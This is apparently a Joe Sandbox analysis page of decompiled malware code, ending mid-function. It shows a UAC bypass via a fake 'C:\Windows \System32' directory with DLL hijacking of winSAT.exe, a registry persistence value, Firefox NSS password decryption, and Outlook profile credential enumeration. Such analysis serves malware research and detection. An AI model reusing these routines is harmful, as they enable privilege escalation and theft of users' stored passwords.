Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
Instruction ID: 8f169916fd9081b99f20e5da6664125bbfa194fb076935f226e5a6a98cc1caf9
Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
Instruction Fuzzy Hash: D0D0EA783619408FDB61CF19C584E01B3E4EB49760B0984E1E905CB731DB34EC40EA40

Uniqueness

Uniqueness Score: -1.00%

Function 01041B38 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01041B38() {

				return  *[fs:0x30];
			}

0x01041b3e

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01042F55 Relevance: 56.2, APIs: 23, Strings: 9, Instructions: 151
fileregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E01042F55(void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				struct _SHELLEXECUTEINFOW _v76;
				short _v2124;
				short _v4172;
				char _v6220;
				void* _t63;
				void* _t69;
				void* _t72;
				void* _t80;
				void* _t81;

				E010311C0(0x1848, _t72);
				if(E0104111B() != 1) {
					CloseHandle( *0x1189cb0);
					E01031052( &_v76, 0, 0x3c);
					_v8 = 0;
					__imp__Wow64DisableWow64FsRedirection( &_v8);
					E01031052( &_v6220, 0, 0x800);
					GetModuleFileNameW(0,  &_v6220, 0x800);
					E01031052( &_v2124, 0, 0x800);
					GetSystemDirectoryW( &_v2124, 0x800);
					lstrcatW( &_v2124, L"\\winSAT.exe");
					E01031052( &_v4172, 0, 0x800);
					GetSystemDirectoryW( &_v4172, 0x800);
					lstrcatW( &_v4172, L"\\winmm.dll");
					CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
					CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
					CopyFileW( &_v2124, L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", 0);
					CopyFileW( &_v4172, L"\\\\?\\C:\\Windows \\System32\\winmmd.dll", 0);
					_t80 = E01042F0D(_t72);
					RegSetValueExW(_t80, L"Virtual Machine Platform", 0, 1,  &_v6220, 0x1000);
					RegCloseKey(_t80);
					__imp__IsWow64Process(GetCurrentProcess(),  &_v12);
					_push(0);
					_push(0);
					_push(2);
					_push(0);
					_push(0);
					_push(0x40000000);
					_push(L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
					if(_v12 != 0) {
						_t63 = CreateFileW();
						_push(0);
						_t81 = _t63;
						_push( &_v16);
						_push(0x3000);
						_push(0x1050408);
					} else {
						_t69 = CreateFileW();
						_push(0);
						_t81 = _t69;
						_push( &_v16);
						_push(0x2e00);
						_push(0x1053408);
					}
					WriteFile(_t81, ??, ??, ??, ??);
					CloseHandle(_t81);
					_v76.cbSize = 0x3c;
					_v76.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
					_v76.lpParameters = L"formal";
					_v76.nShow = 0;
					_v76.hwnd = 0;
					_v76.lpDirectory = 0;
					ShellExecuteExW( &_v76);
					__imp__Wow64RevertWow64FsRedirection(_v8);
					Sleep(0x7d0);
					ExitProcess(0);
				}
				return 0;
			}

0x01042f5d
0x01042f6d
0x01042f7f
0x01042f8a
0x01042f92
0x01042f99
0x01042fad
0x01042fbe
0x01042fcd
0x01042fe3
0x01042ff7
0x01043007
0x0104301b
0x01043029
0x01043039
0x01043041
0x01043056
0x01043065
0x0104306c
0x01043083
0x0104308a
0x0104309b
0x010430a1
0x010430a2
0x010430a3
0x010430a5
0x010430a6
0x010430a7
0x010430ac
0x010430b4
0x010430cf
0x010430d5
0x010430d6
0x010430db
0x010430dc
0x010430e1
0x010430b6
0x010430b6
0x010430bc
0x010430bd
0x010430c2
0x010430c3
0x010430c8
0x010430c8
0x010430e7
0x010430ee
0x010430f3
0x010430fb
0x01043102
0x01043109
0x0104310c
0x0104310f
0x01043112
0x0104311b
0x01043126
0x0104312d
0x0104312d
0x01043139

APIs

Part of subcall function 0104111B: GetCurrentProcess.KERNEL32(00000008,00000000,76B30770,00000000,76B30770,00000000,?,?,?,?,0104563F,?), ref: 0104112D
Part of subcall function 0104111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0104563F,?), ref: 01041134
Part of subcall function 0104111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0104563F,?), ref: 01041152
Part of subcall function 0104111B: FindCloseChangeNotification.KERNEL32(00000000), ref: 01041167

CloseHandle.KERNEL32(?,00000000,?,?,0103555F,?,?,00000000,00000000,?,?,?,01035909,?,00000000,00000000), ref: 01042F7F
Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,01035909,?,00000000,00000000,?,?,?,?,?,?), ref: 01042F99
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,01035909,?,00000000,00000000), ref: 01042FBE
GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01042FE3
lstrcatW.KERNEL32(?,\winSAT.exe), ref: 01042FF7
GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0104301B
lstrcatW.KERNEL32(?,\winmm.dll), ref: 01043029
CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 01043039
CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 01043041
CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 01043056
CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 01043065

Part of subcall function 01042F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,0104306C,00000000,7476FE60,7476F560,?,?,0104306C), ref: 01042F2C
Part of subcall function 01042F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,0104306C,00000000,?,?,0104306C), ref: 01042F47

RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 01043083
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01035909), ref: 0104308A
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01035909), ref: 01043094
IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01035909), ref: 0104309B
CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 010430B6
CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 010430CF
WriteFile.KERNEL32(00000000,01050408,00003000,?,00000000), ref: 010430E7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01035909), ref: 010430EE
ShellExecuteExW.SHELL32(?), ref: 01043112
Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0104311B
Sleep.KERNEL32(000007D0), ref: 01043126
ExitProcess.KERNEL32 ref: 0104312D

Strings

Virtual Machine Platform, xrefs: 0104307D
\\?\C:\Windows \, xrefs: 01043034
\\?\C:\Windows \System32\winmmd.dll, xrefs: 01043059
\\?\C:\Windows \System32, xrefs: 0104303C
<, xrefs: 010430F3
\winSAT.exe, xrefs: 01042FF1
\\?\C:\Windows \System32\WINMM.dll, xrefs: 010430AC
\winmm.dll, xrefs: 0104301D
\\?\C:\Windows \System32\winSAT.exe, xrefs: 01043050

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$CreateProcessWow64$CloseDirectory$CopyCurrentHandleOpenRedirectionSystemTokenlstrcat$ChangeDisableExecuteExitFindInformationModuleNameNotificationRevertShellSleepValueWrite
String ID: <$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll
API String ID: 1410773947-1729731464
Opcode ID: 71617539b63c65f5b75b5fadf2aca29b6cb6ba6ea0aad2dbc83b503b1c358f60
Instruction ID: bfd0052dff447e70b3050848959175aeb07e97f92b866a4b086c789c81c0daec
Opcode Fuzzy Hash: 71617539b63c65f5b75b5fadf2aca29b6cb6ba6ea0aad2dbc83b503b1c358f60
Instruction Fuzzy Hash: 22415EB6940258BBDB209BE59D89ECF7BBCEF85700F004466F685A7140DB795644CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103ADE3 Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219
libraryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0103ADE3(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E01031052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E0103357C( &_a4, _t206, 0, "\\");
				E0103373F( &_v40,  &_a4);
				E0103357C( &_v40, _t206, 0, L"nss3.dll");
				E0103373F( &_v20,  &_a4);
				E0103357C( &_v20, _t206, 0, L"msvcr120.dll");
				E0103373F( &_v16,  &_a4);
				E0103357C( &_v16, _t206, 0, L"msvcp120.dll");
				E0103373F( &_v36,  &_a4);
				E0103357C( &_v36, _t206, 0, L"mozglue.dll");
				E0103373F( &_v32,  &_a4);
				E0103357C( &_v32, _t206, 0, L"softokn3.dll");
				E0103373F( &_v28,  &_a4);
				E0103357C( &_v28, _t206, 0, L"msvcp");
				E0103373F( &_v24,  &_a4);
				E0103357C( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E0103373F( &_v8,  &_v28);
					E0103357C(E01033384( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E01035FEB(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E0103373F( &_v8,  &_v24);
							E0103357C(E01033384( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E01035FEB(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb8) = _t135;
							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E01041E88(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x88)) = E01041E88( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							E01035FEB(_v24);
							E01035FEB(_v28);
							E01035FEB(_v32);
							E01035FEB(_v36);
							E01035FEB(_v16);
							E01035FEB(_v20);
							E01035FEB(_v40);
							E01035FEB(_a4);
							return _t158;
						}
						E01033549( &_v20,  &_v8);
						E01035FEB(_v8);
						goto L9;
					}
				}
				E01033549( &_v16,  &_v8);
				E01035FEB(_v8);
				goto L5;
			}

0x0103ade3
0x0103adfb
0x0103adfd
0x0103ae01
0x0103ae11
0x0103ae1a
0x0103ae28
0x0103ae34
0x0103ae41
0x0103ae4d
0x0103ae5a
0x0103ae66
0x0103ae73
0x0103ae7f
0x0103ae8c
0x0103ae98
0x0103aea5
0x0103aeb1
0x0103aebe
0x0103aeca
0x0103aed7
0x0103aede
0x0103aedf
0x0103aee2
0x0103aee9
0x0103af00
0x0103af10
0x00000000
0x00000000
0x0103af15
0x0103af19
0x0103af1e
0x0103af25
0x0103af28
0x00000000
0x0103af2a
0x0103af40
0x0103af40
0x0103af47
0x0103af5c
0x0103af6c
0x00000000
0x00000000
0x0103af71
0x0103af74
0x0103af79
0x0103af82
0x00000000
0x00000000
0x0103af9a
0x0103afa8
0x0103afb3
0x0103afbe
0x0103afc9
0x0103afcf
0x0103afd1
0x0103afdd
0x0103afef
0x0103aff7
0x0103affd
0x0103afff
0x0103b005
0x0103b01b
0x0103b02e
0x0103b044
0x0103b057
0x0103b06a
0x0103b07d
0x0103b090
0x0103b0a3
0x0103b0ae
0x0103b0bc
0x0103b0c4
0x0103b0c4
0x0103afff
0x0103aff7
0x0103b0c8
0x0103b0d0
0x0103b0d8
0x0103b0e0
0x0103b0e8
0x0103b0f0
0x0103b0f8
0x0103b100
0x0103b10b
0x0103b10b
0x0103af8d
0x0103af95
0x00000000
0x0103af95
0x0103af28
0x0103af33
0x0103af3b
0x00000000

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0103AE11
SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0103AE1A

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 01033384: wsprintfW.USER32 ref: 0103339F

PathFileExistsW.SHLWAPI(01039EC5,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 0103AF08
PathFileExistsW.SHLWAPI(01039EC5,.dll,?,01039EC5,?,00000104,00000000), ref: 0103AF64
LoadLibraryW.KERNEL32(?,01039EC5,?,00000104,00000000), ref: 0103AFA3
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFAE
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFB9
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFC4
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0103AFCF
SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0103B0BC

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

softokn3.dll, xrefs: 0103AE9D
PK11_CheckUserPassword, xrefs: 0103B065
PR_GetError, xrefs: 0103B09E
nss3.dll, xrefs: 0103AE39
PK11_FreeSlot, xrefs: 0103B08B
PK11SDR_Decrypt, xrefs: 0103B03F
msvcp120.dll, xrefs: 0103AE6B
NSS_Init, xrefs: 0103B006
msvcp, xrefs: 0103AEB6
msvcr, xrefs: 0103AECF
msvcr120.dll, xrefs: 0103AE52
NSSBase64_DecodeBuffer, xrefs: 0103B052
PK11_Authenticate, xrefs: 0103B029
NSS_Shutdown, xrefs: 0103B078
.dll, xrefs: 0103AEEE, 0103AF4C
mozglue.dll, xrefs: 0103AE84
PK11_GetInternalKeySlot, xrefs: 0103B016

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
API String ID: 410702425-850564384
Opcode ID: f5f8c0d7703579a4f2bdaa5da42e32208c93507ff7cf524f968200d87413e56e
Instruction ID: 1bc250d8f510472479a0bf9c767f86e5f403add92d046ba435effc16356e5bc1
Opcode Fuzzy Hash: f5f8c0d7703579a4f2bdaa5da42e32208c93507ff7cf524f968200d87413e56e
Instruction Fuzzy Hash: 639164B5A0010AEFCB04FFB0C9D1DEEBB79BFA4200F10456AD5956B1A0DF30AA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0103983D Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0103983D(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E010311C0(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E01031052( &_v4116, 0, 0x800);
				E01031052( &_v8212, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					if(__eflags != 0) {
						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E010399FF(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}

0x0103983d
0x0103983d
0x01039845
0x01039852
0x01039856
0x01039860
0x01039871
0x01039898
0x010398b3
0x010398b5
0x010398d0
0x010398d2
0x010398e1
0x010398ee
0x010398f0
0x010399f8
0x010399f8
0x00000000
0x010399f8
0x010398f6
0x010398f7
0x01039904
0x01039922
0x00000000
0x00000000
0x0103992b
0x010399f3
0x00000000
0x00000000
0x00000000
0x00000000
0x01039931
0x01039931
0x01039933
0x01039955
0x00000000
0x00000000
0x0103995e
0x01039972
0x01039980
0x01039994
0x010399b1
0x010399b3
0x010399b5
0x00000000
0x00000000
0x010399b7
0x010399bb
0x010399be
0x010399c6
0x010399e7
0x00000000
0x00000000
0x010399e9
0x010399ed
0x00000000
0x00000000
0x00000000
0x010399ed
0x00000000
0x01039931
0x010398d4
0x00000000
0x010398d4
0x010398b7
0x00000000
0x010398b7
0x0103989a
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 01039894
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 010398B1
lstrcpyW.KERNEL32 ref: 01039904
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0103991A
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0103994D
RegCloseKey.ADVAPI32(?), ref: 0103995E
lstrcpyW.KERNEL32 ref: 01039972
lstrcatW.KERNEL32(?,010476A4), ref: 01039980
lstrcatW.KERNEL32(?,?), ref: 01039994
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 010399B1
RegCloseKey.ADVAPI32(?,?), ref: 010399C6
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 010399E3

Strings

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0103989A
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0103988A
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 010398A7, 010398B7
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 010398C4, 010398D4
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 010398E1, 010398E6, 010398F6

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
API String ID: 1891545080-2020977430
Opcode ID: 3f9c6e05b255f285487bb8ff28a41d3de9e8efae7d8fc9d4f0f848d8778682b4
Instruction ID: aec35768e0747dac7cb689601139cb2b295b11096324d2d089799ba0a8d6cfa3
Opcode Fuzzy Hash: 3f9c6e05b255f285487bb8ff28a41d3de9e8efae7d8fc9d4f0f848d8778682b4
Instruction Fuzzy Hash: EE4121B690011EFFEB21DA99CDC4EFF77ACEF44384F0005A6B595E2001E6B59E549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0104313A Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90
sleepregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0104313A(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t53;

				if(E0104111B() != 1) {
					CloseHandle( *0x1189cb0);
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t47 =  &_v12;
						E01040CFF( &_v12);
					}
					E01042E91();
					E01031052( &_v1616, 0, 0x400);
